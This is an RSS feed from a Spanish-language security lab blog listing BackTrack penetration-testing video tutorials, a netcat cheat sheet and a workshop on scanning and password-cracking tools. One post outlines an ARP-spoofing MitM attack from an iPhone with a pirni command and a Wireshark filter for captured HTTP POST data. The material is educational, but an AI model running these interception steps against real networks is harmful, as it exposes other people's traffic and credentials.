<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Labs DragonJAR &#187; BackTrack</title>
	<atom:link href="http://labs.dragonjar.org/category/backtrack/feed" rel="self" type="application/rss+xml" />
	<link>http://labs.dragonjar.org</link>
	<description>Laboratorios de Seguridad Informática: Comunidad DragonJAR</description>
	<lastBuildDate>Sun, 06 Jun 2010 10:34:51 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Video tutoriales de introducción a BackTrack</title>
		<link>http://labs.dragonjar.org/video-tutoriales-de-introduccion-a-backtrack</link>
		<comments>http://labs.dragonjar.org/video-tutoriales-de-introduccion-a-backtrack#comments</comments>
		<pubDate>Mon, 08 Mar 2010 04:52:52 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Banner Identification]]></category>
		<category><![CDATA[Enumeración]]></category>
		<category><![CDATA[Ethical Hacking]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=870</guid>
		<description><![CDATA[El año pasado tuve la oportunidad y el placer de asistir como ponente en varias conferencias nacionales sobre diferentes temáticas relacionadas con la seguridad de la información. Una de ellas fue el evento que cada año lidera incansablemente Diego A Salazar: Securinf; en este evento participé con dos conferencias: Análisis de Malware sobre windows y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El año pasado tuve la oportunidad y el placer de asistir como ponente en varias conferencias nacionales sobre diferentes temáticas relacionadas con la seguridad de la información.</p>
<p style="text-align: justify;">Una de ellas fue el evento que cada año lidera incansablemente Diego A Salazar: <a href="http://securinf.com/" target="_blank"><strong>Securinf</strong></a>; en este evento participé con dos conferencias: Análisis de Malware sobre windows y un WorkShop de BackTrack.</p>
<p style="text-align: justify;">El objetivo de este post es publicar los video tutoriales que presenté ese día. Aunque son muy cortos y básicos pueden servir para quienes recién inician en este campo de la seguridad mediante el uso de la distribución BackTrack. También debe tenerse en cuenta que estos los realicé exclusivamente para un workshop, por lo tanto no tienen audio, pues están pensados en ir mostrando la herramienta e ir explicando su funcionamiento y configuración en vivo. Haré una recopilación de lo publicado hasta el momento sobre los laboratorios de BackTrack y luego los enlaces de descarga con una pequeña descripción de los videos presentados en la conferencia.</p>
<h3><a rel="bookmark" href="../video-tutorial-backtrack-introduccion-y-conceptos-basicos">Video Tutorial BackTrack, Introducción y Conceptos Básicos</a></h3>
<h3><a rel="bookmark" href="../video-tutorial-backtrack-booteo-interfaz-grafica-y-directorios">Video Tutorial BackTrack: Booteo, Interfaz Gráfica y Directorios</a></h3>
<h3><a rel="bookmark" href="../video-tutorial-instalacion-de-backtrack-4-pre-final">Video Tutorial: Instalación de BackTrack 4 (Pre-Final)</a></h3>
<h3><a rel="bookmark" href="../video-tutorial-configuracion-basica-de-red-en-backtrack-4-pre-final">Video Tutorial: Configuración Básica de Red en BackTrack 4 (Pre-Final)</a></h3>
<h3><a rel="bookmark" href="../video-tutorial-instalacion-de-vmware-workstation-en-backtrack-4-pre-final">Video Tutorial: Instalación de VMWare WorkStation en BackTrack 4 (Pre-Final)</a></h3>
<p style="text-align: justify;">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p style="text-align: justify;"><strong>Videos del WorkShop de Backtrack:</strong></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/234959762/af2fea7b/Booteo_BackTrack.html" target="_blank">01- Booteo BackTrack (Creación y configuración de una máquina virtual en VirtualBox &#8211; Booteo inicial de BackTrack)</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/234969634/7d59abec/Inicio_backtrack.html" target="_blank">02 &#8211; Ejecución inicial de BackTrack (Inicio del servicio de red, Inicio del servidor X, Cambio de contraseña, Rápido recorrido por el menú K)</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/234981672/8ad25d53/BackTrack_Directorios_Servicio.html" target="_blank">03 &#8211; Recorrido por los directorios de herramientas contenidas en BackTrack -Web, Wireless, Passwords, Cisco, etc. Ejecución de servicios disponibles en BackTrack &#8211; HTTP, VNC, TFPT, etc.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/234998735/317001f9/02-nmap.html" target="_blank">04 &#8211; Escaneo e identificación  de puertos y servicios con Nmap en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235037492/c4169002/BackTrack_AutoScan.html" target="_blank">05 &#8211; Escaneo automatizado de nuestra red con la herramienta AutoScan en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/234992970/4055fd1c/BackTrack_Maltego.html" target="_blank">06 &#8211; Information Gathering/Footprinting con Maltego en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235092743/79978813/BackTrack_Reversing.html" target="_blank">07 &#8211; Introducción al análisis básico de ejecutables con OllyDbg en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235115468/b8ce2d9d/cifrados_web.html" target="_blank">08 &#8211; Identificación de cifrados utilizados en la web con BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235070644/f308016d/DirBuster.html" target="_blank">09 &#8211; Escaneo e identificación de directorios y archivos sensibles en servidores web con DirBuster en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235130659/aa7e39f4/identificacion_servidor_web.html" target="_blank">10 &#8211; Identificación del servidor Web con netcat y httprint.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235075306/487f979c/nikto_wikto.html" target="_blank">11 &#8211; Escaneo e identificación de directorios y archivos sensibles en servidores Web con Nikto (BackTrack) y Wikto (Windows).</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235104319/1bd39c/spidering_wget.html" target="_blank">12 &#8211; Spidering con Wget en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235086341/2292ff04/PenTest4.html" target="_blank">13 &#8211; Xhydra y John The Ripper en BackTrack.</a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutoriales-de-introduccion-a-backtrack/feed</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>Video Tutorial: Ataque MitM desde un Iphone / Ipod Touch</title>
		<link>http://labs.dragonjar.org/video-tutorial-ataque-mitm-desde-un-iphone-ipod-touch</link>
		<comments>http://labs.dragonjar.org/video-tutorial-ataque-mitm-desde-un-iphone-ipod-touch#comments</comments>
		<pubDate>Sun, 23 Aug 2009 19:41:59 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Iphone]]></category>
		<category><![CDATA[Ipod Touch]]></category>
		<category><![CDATA[MitM]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Sniffing]]></category>
		<category><![CDATA[spoofing]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=841</guid>
		<description><![CDATA[Los ataques MitM (Man in the Middle / Hombre en el medio) hacen referencia a que el atacante adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Los ataques MitM (Man in the Middle / Hombre en el medio) hacen referencia a que el atacante adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas. <a href="http://es.wikipedia.org/wiki/MitM" target="_blank"> Más información&gt;&gt;</a></p>
<p style="text-align: justify;">Hace poco había publicado una serie de post dedicados al uso de los dispositivos Iphone / Ipod Touch como herramientas para los Test de Penetración:</p>
<p style="text-align: justify;">=========================================================<br />
<a title="Enlace permanente a Iphone/Ipod Touch como herramienta de Test de Penetración I de III" rel="bookmark" href="http://www.dragonjar.org/iphoneipod-touch-como-herramienta-de-test-de-penetracion-i-de-iii.xhtml" target="_blank">Iphone/Ipod Touch como herramienta de Test de Penetración (I de III) </a><br />
<a title="Enlace permanente a Iphone/Ipod Touch como herramienta de Test de Penetración II de III" rel="bookmark" href="http://www.dragonjar.org/iphoneipod-touch-como-herramienta-de-test-de-penetracion-ii-de-iii.xhtml" target="_blank">Iphone/Ipod Touch como herramienta de Test de Penetración (II de III)</a><br />
<a title="Enlace permanente a Iphone/Ipod Touch como herramienta de Test de Penetración III de III" rel="bookmark" href="http://www.dragonjar.org/iphoneipod-touch-como-herramienta-de-test-de-penetracion-iii-de-iii.xhtml" target="_blank">Iphone/Ipod Touch como herramienta de Test de Penetración (III de III)<br />
</a>=========================================================</p>
<p style="text-align: justify;">Ahora veremos una técnica más avanzada para realizar este tipo de procedimientos.</p>
<p style="text-align: justify;">El siguiente video tutorial muestra el proceso necesario para llevar a cabo un ataque del tipo MitM ejecutandose desde el Ipod Touch/Iphone.</p>
<p style="text-align: justify;"><strong>Resumen:</strong></p>
<ul style="text-align: justify;">
<li>Identificación de máquina (dispositivo) objetivo y equipos objetivos (Laptop/PC, Router)</li>
<li>Ejecución de VNCviewer (Solo para propósitos demostrativos para el correcto entendimiento del video)</li>
<li>Instalación de la herramienta PIRNI desde cydia en el Ipod Touch/Iphone (<a href="http://modmyi.com/cydia/package.php?id=9110" target="_blank">Info PIRNI</a>).</li>
<li>Ejecución de la herramienta PIRNI:
<ul>
<li>pirni (visualización de opciones de la herramienta)</li>
<li>pirni -s IP_GW -d IP_máquina_objetivo -o archivo_salida.pcap</li>
</ul>
</li>
<li>Transferencia del archivo .PCAP a un equipo para analizar los paquetes capturados (FileZilla)</li>
<li>Análisis de los paquetes capturados (Wireshark con filtro HTTP y método POST)</li>
</ul>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="640" height="510" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://blip.tv/play/AYGapCYA" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="640" height="510" src="http://blip.tv/play/AYGapCYA" allowfullscreen="true"></embed></object></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/127141104/c4d3318e/MitM_Ipod-Iphone_LabsDragonJAR.html" target="_blank"><strong><strong>Descargar video tutorial: </strong>Ataque MitM desde un Iphone / Ipod Touch</strong></a><strong> </strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-ataque-mitm-desde-un-iphone-ipod-touch/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Video Tutorial: Instalación de VMWare WorkStation en BackTrack 4 (Pre-Final)</title>
		<link>http://labs.dragonjar.org/video-tutorial-instalacion-de-vmware-workstation-en-backtrack-4-pre-final</link>
		<comments>http://labs.dragonjar.org/video-tutorial-instalacion-de-vmware-workstation-en-backtrack-4-pre-final#comments</comments>
		<pubDate>Sun, 23 Aug 2009 00:37:28 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=835</guid>
		<description><![CDATA[Continua desde &#8220;Video Tutorial: Configuración Básica de Red en BackTrack 4 (Pre-Final)&#8220;. Quinto video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack. En este Video tutorial veremos como llevar a cabo la instalación básica de VMWare WorkStation en BackTrack. Resumen: Descarga de aplicativo VMWare WorkStation (www.vmware.com/downloads). Ejecución de del archivo de instalación [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continua desde &#8220;<a href="../video-tutorial-configuracion-basica-de-red-en-backtrack-4-pre-final">Video Tutorial: Configuración Básica de Red en BackTrack 4 (Pre-Final)</a>&#8220;.</p>
<p style="text-align: justify;">Quinto video tutorial dedicado al uso y configuración de la distribución <a href="http://labs.dragonjar.org/tag/backtrack" target="_blank">GNU/Linux BackTrack</a>.</p>
<p style="text-align: justify;">En este Video tutorial veremos como llevar a cabo la instalación básica de <a href="http://labs.dragonjar.org/tag/vmware" target="_blank">VMWare WorkStation</a> en <a href="http://labs.dragonjar.org/tag/backtrack" target="_blank">BackTrack</a>.</p>
<p style="text-align: justify;"><strong>Resumen:</strong></p>
<ul style="text-align: justify;">
<li>Descarga de aplicativo <a href="http://labs.dragonjar.org/tag/vmware" target="_blank">VMWare WorkStation</a> (<a href="www.vmware.com/downloads" target="_blank">www.vmware.com/downloads</a>).</li>
<li>Ejecución de del archivo de instalación (sudo sh vmware_versión.bundle).</li>
<li>Ejecución de VMWare WorkStation y el proceso de VMWare Kernel Module Updater.</li>
</ul>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="672" height="542" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://blip.tv/play/AYGakm0A" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="672" height="542" src="http://blip.tv/play/AYGakm0A" allowfullscreen="true"></embed></object></p>
<p><strong><a href="http://www.4shared.com/file/126669258/b652773a/Inst_VMWare_BT_LabsDragonJARorg.html" target="_blank">Descargar video tutorial: Instalación de VMWare WorkStation en BackTrack</a> </strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-instalacion-de-vmware-workstation-en-backtrack-4-pre-final/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Video Tutorial: Configuración Básica de Red en BackTrack 4 (Pre-Final)</title>
		<link>http://labs.dragonjar.org/video-tutorial-configuracion-basica-de-red-en-backtrack-4-pre-final</link>
		<comments>http://labs.dragonjar.org/video-tutorial-configuracion-basica-de-red-en-backtrack-4-pre-final#comments</comments>
		<pubDate>Fri, 21 Aug 2009 12:23:27 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=827</guid>
		<description><![CDATA[Continua desde &#8220;Video Tutorial: Instalación de BackTrack 4 (Pre-Final)&#8221;. Cuarto video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack. En este video tutorial veremos diferentes métodos de configuración básica.para el acceso a internet/intranet. Resumen: Ejecución de la instrucción start-network. Instalación y ejecución de dhcpcd (dhcpcd nombre_interfaz#). Configuración manual: ifconfig interfaz IP route [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continua desde &#8220;<a href="http://labs.dragonjar.org/video-tutorial-instalacion-de-backtrack-4-pre-final" target="_blank">Video Tutorial: Instalación de BackTrack 4 (Pre-Final</a>)&#8221;.</p>
<p style="text-align: justify;">Cuarto video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack.</p>
<p style="text-align: justify;">En este video tutorial veremos diferentes métodos de configuración básica.para el acceso a internet/intranet.</p>
<p style="text-align: justify;"><strong>Resumen:</strong></p>
<ul style="text-align: justify;">
<li>Ejecución de la instrucción start-network.</li>
<li>Instalación y ejecución de dhcpcd (dhcpcd nombre_interfaz#).</li>
<li>Configuración manual:
<ul>
<li>ifconfig interfaz IP</li>
<li>route add default gw IP_gw</li>
<li>echo nameserver IP_gw &gt; /etc/resolv.conf</li>
</ul>
</li>
</ul>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="672" height="542" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://blip.tv/play/AYGZ3wcA" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="672" height="542" src="http://blip.tv/play/AYGZ3wcA" allowfullscreen="true"></embed></object></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/126662782/32e3a583/Config_Network_BT_LabsDragonJARorg.html" target="_blank"><strong>Descargar video tutorial: </strong></a><strong><a href="http://www.4shared.com/file/126662782/32e3a583/Config_Network_BT_LabsDragonJARorg.html" target="_blank">Configuración Básica de Red en BackTrack 4 (Pre-Final)</a> </strong>(<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-configuracion-basica-de-red-en-backtrack-4-pre-final/feed</wfw:commentRss>
		<slash:comments>24</slash:comments>
		</item>
		<item>
		<title>Video Tutorial: Instalación de BackTrack 4 (Pre-Final)</title>
		<link>http://labs.dragonjar.org/video-tutorial-instalacion-de-backtrack-4-pre-final</link>
		<comments>http://labs.dragonjar.org/video-tutorial-instalacion-de-backtrack-4-pre-final#comments</comments>
		<pubDate>Fri, 24 Jul 2009 02:26:53 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=813</guid>
		<description><![CDATA[Continua desde &#8220;Video Tutorial BackTrack: Booteo, Interfaz Gráfica y Directorios&#8220;. Tercer video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack. En este Video tutorial veremos como llevar a cabo la instalación de BackTrack 4 Pre-Final en un sistema en limpio (Disco duro completo). Resumen: Booteo de BackTrack. Ejecución de ubiquity. Particionamiento. Descargar [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continua desde &#8220;<a href="http://labs.dragonjar.org/video-tutorial-backtrack-booteo-interfaz-grafica-y-directorios" target="_blank">Video Tutorial BackTrack: Booteo, Interfaz Gráfica y Directorios</a>&#8220;.</p>
<p style="text-align: justify;">Tercer video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack.</p>
<p style="text-align: justify;">En este Video tutorial veremos como llevar a cabo la instalación de BackTrack 4 Pre-Final en un sistema en limpio (Disco duro completo).</p>
<p style="text-align: justify;"><strong>Resumen:</strong></p>
<ul style="text-align: justify;">
<li>Booteo de BackTrack.</li>
<li>Ejecución de ubiquity.</li>
<li>Particionamiento.</li>
</ul>
<p style="text-align: center;"><embed src="http://blip.tv/play/AYGTsh8A" type="application/x-shockwave-flash" width="640" height="510" allowscriptaccess="always" allowfullscreen="true"></embed></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/120199283/68ab42ac/BT4_iii_LabsDragonJARorg.html" target="_blank"><strong>Descargar video tutorial: Instalación de BackTrack 4 (Pre-Final)</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-instalacion-de-backtrack-4-pre-final/feed</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>Video Tutorial BackTrack: Booteo, Interfaz Gráfica y Directorios</title>
		<link>http://labs.dragonjar.org/video-tutorial-backtrack-booteo-interfaz-grafica-y-directorios</link>
		<comments>http://labs.dragonjar.org/video-tutorial-backtrack-booteo-interfaz-grafica-y-directorios#comments</comments>
		<pubDate>Thu, 23 Jul 2009 20:35:21 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=809</guid>
		<description><![CDATA[Continua desde &#8220;Video Tutorial BackTrack, Introducción y Conceptos Básicos&#8220;. Segundo video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack. En este Video tutorial veremos como iniciar con BackTrack en modo LiveDVD, conoceremos su interfaz gráfica y un primer acercamiento a las categorías de herramientas que esta incluye. Resumen: Descarga de BackTrack y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continua desde &#8220;<a href="http://labs.dragonjar.org/video-tutorial-backtrack-introduccion-y-conceptos-basicos" target="_blank">Video Tutorial BackTrack, Introducción y Conceptos Básicos</a>&#8220;.</p>
<p style="text-align: justify;">Segundo video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack.</p>
<p style="text-align: justify;">En este Video tutorial veremos como iniciar con BackTrack en modo LiveDVD, conoceremos su interfaz gráfica y un primer acercamiento a las categorías de herramientas que esta incluye.</p>
<p style="text-align: justify;"><strong>Resumen:</strong></p>
<ul>
<li>Descarga de BackTrack y grabación de la imagen.</li>
<li>Booteo de BackTrack.</li>
<li>Interfaz Gráfica de BackTrack.</li>
<li>Directorios de BackTrack.</li>
</ul>
<p style="text-align: center;"><embed src="http://blip.tv/play/AYGTqloA" type="application/x-shockwave-flash" width="640" height="510" allowscriptaccess="always" allowfullscreen="true"></embed></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/120148909/cde6d8f/BT_ii_LabsDragonJARorg.html" target="_blank"><strong>Descargar video tutorial BackTrack: booteo, interfaz gráfica y directorios</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-backtrack-booteo-interfaz-grafica-y-directorios/feed</wfw:commentRss>
		<slash:comments>14</slash:comments>
		</item>
		<item>
		<title>Video Tutorial BackTrack, Introducción y Conceptos Básicos</title>
		<link>http://labs.dragonjar.org/video-tutorial-backtrack-introduccion-y-conceptos-basicos</link>
		<comments>http://labs.dragonjar.org/video-tutorial-backtrack-introduccion-y-conceptos-basicos#comments</comments>
		<pubDate>Tue, 07 Jul 2009 20:37:28 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Video Tutorial]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=805</guid>
		<description><![CDATA[Comienza una nueva serie de video tutoriales dedicados al uso y configuración de la distribución GNU/Linux enfocada a la Seguridad de la Información (Penetration Testing) BackTrack. La idea será llevar a cabo y en modo de video tutoriales el contenido que había anunciado en este post (Contenido y Recursos). En este primer video tutorial haremos [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Comienza una nueva serie de video tutoriales dedicados al uso y configuración de la distribución GNU/Linux enfocada a la Seguridad de la Información (Penetration Testing) BackTrack.</p>
<p style="text-align: justify;">La idea será llevar a cabo y en modo de video tutoriales el contenido que había anunciado en este post (<a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-contenido-y-recursos" target="_blank"><strong>Contenido y Recursos</strong></a>).</p>
<p style="text-align: justify;">En este primer video tutorial haremos un completa introducción a BackTrack y los conceptos básicos que ella abarca.</p>
<p style="text-align: justify;"><strong>Resumen:</strong></p>
<ul>
<li>Introducción a BackTrack (Distribución GNU/Linux &#8211; LiveCD/DVD/VMWare)</li>
<li>Definiciones /Conceptos Básicos (Repositorios de herramientas)</li>
<li>Categorías / Herramientas / Fases (Enumeration, Web Applications, Fuzzers, etc / Meta Packages)</li>
<li>Enlaces de descarga / Más información</li>
</ul>
<p><embed src="http://blip.tv/play/AYGPwEkA" type="application/x-shockwave-flash" width="640" height="510" allowscriptaccess="always" allowfullscreen="true"></embed></p>
<p><a href="http://www.4shared.com/file/116586023/820d3761/BT_i_LabsDragonJARorg.html" target="_blank"><strong>Descargar video tutorial de BackTrack, Introducción y Conceptos Básicos</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-backtrack-introduccion-y-conceptos-basicos/feed</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>Cheat Sheet: Netcat</title>
		<link>http://labs.dragonjar.org/cheat-sheet-netcat</link>
		<comments>http://labs.dragonjar.org/cheat-sheet-netcat#comments</comments>
		<pubDate>Tue, 05 May 2009 20:19:25 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Cheat Sheet]]></category>
		<category><![CDATA[Comandos Linux]]></category>
		<category><![CDATA[Netcat]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=741</guid>
		<description><![CDATA[Un Cheat Sheet puede ser definido como un conjunto o agrupación de notas (comandos, instrucciones, parámetros, etc.) que sirven o se aplican como referencia inmediata para una determinada herramienta (software), lenguaje de programación, materia o procedimiento (técnica). El siguiente Cheat Sheet proporciona diversas instrucciones de ejemplo sobre el uso de la herramienta Netcat sobre diferentes [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Un Cheat Sheet puede ser definido como un conjunto o agrupación de notas (comandos, instrucciones, parámetros, etc.) que sirven o se aplican como referencia inmediata para una determinada herramienta (software), lenguaje de programación, materia o procedimiento (técnica).</p>
<p style="text-align: justify;">El siguiente Cheat Sheet proporciona diversas instrucciones de ejemplo sobre el uso de la herramienta Netcat sobre diferentes Sistemas Operativos.</p>
<p style="text-align: justify;"><strong>Contenido:</strong></p>
<ul>
<li>Fundamental Netcat Cliente</li>
<li>Netcat Command Flags</li>
<li>Netcat Relays on Windows</li>
<li>File Transfer</li>
<li>TCP Port Scanner</li>
<li>TCP Banner Graber</li>
<li>Backdoor Shells</li>
<li>Netcat Relays on Linux</li>
</ul>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/103587601/7c960021/Netcat_Cheat_Sheet_DragonJARorg.html" target="_blank"><strong>Descargar Cheat Sheet de Netcat</strong></a> PDF (<strong>Password:</strong> www.dragonjar.org)</p>
<p style="text-align: justify;">Este Cheat Sheet fué desarrollado y publicado por la <a href="http://www.sans.org/" target="_blank"><strong>SANS</strong></a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/cheat-sheet-netcat/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Video Tutorial de Instalación de BackTrack 4 Beta</title>
		<link>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-4-beta</link>
		<comments>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-4-beta#comments</comments>
		<pubDate>Fri, 13 Feb 2009 21:45:28 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=578</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>El siguiente video tutorial muestra el proceso necesario para llevar a cabo la instalación de la nueva versión de BackTrack en su fase beta en el disco duro de una PC.</p>
<p><strong><a href="http://www.4shared.com/file/87539628/15bd95a5/Instalacin_BackTrack_4_Beta_LabsDragonJARorg.html">Descargar video tutorial de instalación de BackTrack 4 Beta en el disco duro</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
<p>Recuerda estudiar los diferentes recursos publicados relacionados con la distribución <strong><a href="http://labs.dragonjar.org/category/backtrack">BackTrack</a></strong> y los Test de Penetración.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-4-beta/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Video tutorial de instalación de BackTrack 3</title>
		<link>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3</link>
		<comments>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3#comments</comments>
		<pubDate>Thu, 27 Nov 2008 19:20:10 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Backtrack 3]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=407</guid>
